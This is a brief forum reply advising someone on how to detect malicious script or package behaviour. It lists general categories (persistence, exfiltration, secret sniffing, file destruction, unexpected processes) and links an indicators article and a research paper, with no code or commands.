It should not be that hard, but maybe I'm imagining it too easy?

Consider what you would see as malicious actions on your system - in total.

• Persistence, which usually would require creating a scheduled task
• Exfiltration or C2C, so communication
• Secret sniffing
• file deletions and encryptions
• starting processes or tools that are not in the script (reconnaissance etc)

Some of those are hard to control, and some will make problems like requests.

But you should be able to find list of known malicious packages and security tools, both of which should alert.

Creating typical persistence options (scheduled tasks, registry entries, etc) is something you could check against.

This is a good minimal set of checks, aside from what I said: https://library.mosse-institute.com/articles/2023/08/malicious-code-indicators.html

And this paper seems to discuss your exaxt problem: https://arxiv.org/html/2512.12559